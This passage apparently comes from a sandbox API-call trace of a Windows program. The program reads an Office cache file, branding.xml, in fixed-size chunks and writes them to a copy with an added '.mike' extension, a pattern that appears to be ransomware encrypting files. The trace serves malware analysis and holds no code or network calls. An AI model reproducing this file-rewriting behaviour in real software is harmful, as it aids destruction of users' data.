nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af0dc, lpOverlapped=0x0 | out: lpBuffer=0x21b0dfc*, lpNumberOfBytesWritten=0x2af0dc*=0x2800, lpOverlapped=0x0) returned 1 [0041.494] CloseHandle (hObject=0x264) returned 1 [0041.495] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml", lpFilePart=0x0) returned 0x58 [0041.495] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\branding.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.495] GetFileType (hFile=0x264) returned 0x1 [0041.495] GetFileType (hFile=0x264) returned 0x1 [0041.495] SetFilePointer (in: hFile=0x264, lDistanceToMove=30720, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x7800 [0041.495] ReadFile (in: hFile=0x264, lpBuffer=0x21b38a0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x21b38a0*, lpNumberOfBytesRead=0x2af0c8*=0x2800, lpOverlapped=0x0) returned 1 [0041.495] CloseHandle (hObject=0x264) returned 1 [0041.496] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml.mike", lpFilePart=0x0) returned 0x5d [0041.496] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\branding.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.496] GetFileType (hFile=0x264) returned 0x1 [0041.496] GetFileType (hFile=0x264) returned 0x1 [0041.496] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x7a20 [0041.496] WriteFile (in: hFile=0x264, lpBuffer=0x21bde08*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af0dc, lpOverlapped=0x0 | out: lpBuffer=0x21bde08*, lpNumberOfBytesWritten=0x2af0dc*=0x2800, lpOverlapped=0x0) returned 1 [0041.497] CloseHandle (hObject=0x264) returned 1 [0041.497] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml", lpFilePart=0x0) returned 0x58 [0041.497] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\branding.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.498] GetFileType (hFile=0x264) returned 0x1 [0041.498] GetFileType (hFile=0x264) returned 0x1 [0041.498] SetFilePointer (in: hFile=0x264, lDistanceToMove=40960, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0xa000 [0041.498] ReadFile (in: hFile=0x264, lpBuffer=0x21c08ac, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x21c08ac*, lpNumberOfBytesRead=0x2af0c8*=0x2800, lpOverlapped=0x0) returned 1 [0041.498] CloseHandle (hObject=0x264) returned 1 [0041.499] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml.mike", lpFilePart=0x0) returned 0x5d [0041.499] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\branding.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.499] GetFileType (hFile=0x264) returned 0x1 [0041.499] GetFileType (hFile=0x264) returned 0x1 [0041.499] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0xa220 [0041.499] WriteFile (in: hFile=0x264, lpBuffer=0x21cae14*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af0dc, lpOverlapped=0x0 | out: lpBuffer=0x21cae14*, lpNumberOfBytesWritten=0x2af0dc*=0x2800, lpOverlapped=0x0) returned 1 [0041.499] CloseHandle (hObject=0x264) returned 1 [0041.500] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml", lpFilePart=0x0) returned 0x58 [0041.500] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\branding.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.500] GetFileType (hFile=0x264) returned 0x1 [0041.500] GetFileType (hFile=0x264) returned 0x1 [0041.500] SetFilePointer (in: hFile=0x264, lDistanceToMove=51200, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0xc800 [0041.500] ReadFile (in: hFile=0x264, lpBuffer=0x21cd8b8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x21cd8b8*, lpNumberOfBytesRead=0x2af0c8*=0x2800, lpOverlapped=0x0) returned 1 [0041.500] CloseHandle (hObject=0x264) returned 1 [0041.501] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml.mike", lpFilePart=0x0) returned 0x5d [0041.501] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\branding.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.501] GetFileType (hFile=0x264) returned 0x1 [0041.501] GetFileType (hFile=0x264) returned 0x1 [0041.501] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0xca20 [0041.501] WriteFile (in: hFile=0x264, lpBuffer=0x21d7e20*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af0dc, lpOverlapped=0x0 | out: lpBuffer=0x21d7e20*, lpNumberOfBytesWritten=0x2af0dc*=0x2800, lpOverlapped=0x0) returned 1 [0041.502] CloseHandle (hObject=0x264) returned 1 [0041.503] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml", lpFilePart=0x0) returned 0x58 [0041.503] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\branding.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.503] GetFileType (hFile=0x264) returned 0x1 [0041.503] GetFileType (hFile=0x264) returned 0x1 [0041.503] SetFilePointer (in: hFile=0x264, lDistanceToMove=61440, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0xf000 [0041.503] ReadFile (in: hFile=0x264, lpBuffer=0x21da8c4, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x21da8c4*, lpNumberOfBytesRead=0x2af0c8*=0x2800, lpOverlapped=0x0) returned 1 [0041.503] CloseHandle (hObject=0x264) returned 1 [0041.504] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml.mike", lpFilePart=0x0) returned 0x5d [0041.504] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\branding.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.504] GetFileType (hFile=0x264) returned 0x1 [0041.504] GetFileType (hFile=0x264) returned 0x1 [0041.504] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0xf220 [0041.504] WriteFile (in: hFile=0x264, lpBuffer=0x21e4e2c*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af0dc, lpOverlapped=0x0 | out: lpBuffer=0x21e4e2c*, lpNumberOfBytesWritten=0x2af0dc*=0x2800, lpOverlapped=0x0) returned 1 [0041.504] CloseHandle (hObject=0x264) returned 1 [0041.505] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml", lpFilePart=0x0) returned 0x58 [0041.506] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\branding.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.506] GetFileType (hFile=0x264) returned 0x1 [0041.506] GetFileType (hFile=0x264) returned 0x1 [0041.506] SetFilePointer (in: hFile=0x264, lDistanceToMove=71680, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x11800 [0041.506] ReadFile (in: hFile=0x264, lpBuffer=0x21e78d0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x21e78d0*, lpNumberOfBytesRead=0x2af0c8*=0x2800, lpOverlapped=0x0) returned 1 [0041.506] CloseHandle (hObject=0x264) returned 1 [0041.507] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml.mike", lpFilePart=0x0) returned 0x5d [0041.507] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\branding.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.507] GetFileType (hFile=0x264) returned 0x1 [0041.507] GetFileType (hFile=0x264) returned 0x1 [0041.507] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x11a20 [0041.507] WriteFile (in: hFile=0x264, lpBuffer=0x21f1e38*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af0dc, lpOverlapped=0x0 | out: lpBuffer=0x21f1e38*, lpNumberOfBytesWritten=0x2af0dc*=0x2800, lpOverlapped=0x0) returned 1 [0041.507] CloseHandle (hObject=0x264) returned 1 [0041.508] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml", lpFilePart=0x0) returned 0x58 [0041.508] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\branding.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.508] GetFileType (hFile=0x264) returned 0x1 [0041.508] GetFileType (hFile=0x264) returned 0x1 [0041.508] SetFilePointer (in: hFile=0x264, lDistanceToMove=81920, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x14000 [0041.509] ReadFile (in: hFile=0x264, lpBuffer=0x21f48dc, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x21f48dc*, lpNumberOfBytesRead=0x2af0c8*=0x2800, lpOverlapped=0x0) returned 1 [0041.509] CloseHandle (hObject=0x264) returned 1 [0041.509] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml.mike", lpFilePart=0x0) returned 0x5d [0041.509] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\branding.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.509] GetFileType (hFile=0x264) returned 0x1 [0041.509] GetFileType (hFile=0x264) returned 0x1 [0041.509] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x14220 [0041.510] WriteFile (in: hFile=0x264, lpBuffer=0x21fee44*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af0dc, lpOverlapped=0x0 | out: lpBuffer=0x21fee44*, lpNumberOfBytesWritten=0x2af0dc*=0x2800, lpOverlapped=0x0) returned 1 [0041.510] CloseHandle (hObject=0x264) returned 1 [0041.511] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml", lpFilePart=0x0) returned 0x58 [0041.511] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\branding.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.511] GetFileType (hFile=0x264) returned 0x1 [0041.511] GetFileType (hFile=0x264) returned 0x1 [0041.511] SetFilePointer (in: hFile=0x264, lDistanceToMove=92160, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x16800 [0041.511] ReadFile (in: hFile=0x264, lpBuffer=0x22018e8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x22018e8*, lpNumberOfBytesRead=0x2af0c8*=0x2800, lpOverlapped=0x0) returned 1 [0041.512] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml.mike", lpFilePart=0x0) returned 0x5d [0041.512] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\branding.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.512] GetFileType (hFile=0x264) returned 0x1 [0041.512] GetFileType (hFile=0x264) returned 0x1 [0041.512] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x16a20 [0041.513] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml", lpFilePart=0x0) returned 0x58 [0041.513] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\branding.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.513] GetFileType (hFile=0x264) returned 0x1 [0041.513] GetFileType (hFile=0x264) returned 0x1 [0041.513] SetFilePointer (in: hFile=0x264, lDistanceToMove=102400, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x19000 [0041.513] ReadFile (in: hFile=0x264, lpBuffer=0x220e8f4, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x220e8f4*, lpNumberOfBytesRead=0x2af0c8*=0x2800, lpOverlapped=0x0) returned 1 [0041.514] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml.mike", lpFilePart=0x0) returned 0x5d [0041.514] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\branding.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.514] GetFileType (hFile=0x264) returned 0x1 [0041.514] GetFileType (hFile=0x264) returned 0x1 [0041.514] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x19220 [0041.514] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml", lpFilePart=0x0) returned 0x58 [0041.514] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\branding.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.515] GetFileType (hFile=0x264) returned 0x1 [0041.515] GetFileType (hFile=0x264) returned 0x1 [0041.515] SetFilePointer (in: hFile=0x264, lDistanceToMove=112640, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x1b800 [0041.515] ReadFile (in: hFile=0x264, lpBuffer=0x221b900, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x221b900*, lpNumberOfBytesRead=0x2af0c8*=0x2800, lpOverlapped=0x0) returned 1 [0041.515] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml.mike", lpFilePart=0x0) returned 0x5d [0041.515] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\branding.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.516] GetFileType (hFile=0x264) returned 0x1 [0041.516] GetFileType (hFile=0x264) returned 0x1 [0041.516] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x1ba20 [0041.516] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml", lpFilePart=0x0) returned 0x58 [0041.516] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\branding.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.516] GetFileType (hFile=0x264) returned 0x1 [0041.516] GetFileType (hFile=0x264) returned 0x1 [0041.516] SetFilePointer (in: hFile=0x264, lDistanceToMove=122880, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x1e000 [0041.516] ReadFile (in: hFile=0x264, lpBuffer=0x222890c, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x222890c*, lpNumberOfBytesRead=0x2af0c8*=0x2800, lpOverlapped=0x0) returned 1 [0041.536] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml.mike", lpFilePart=0x0) returned 0x5d [0041.536] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\branding.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.536] GetFileType (hFile=0x264) returned 0x1 [0041.536] GetFileType (hFile=0x264) returned 0x1 [0041.536] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x1e220 [0041.536] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 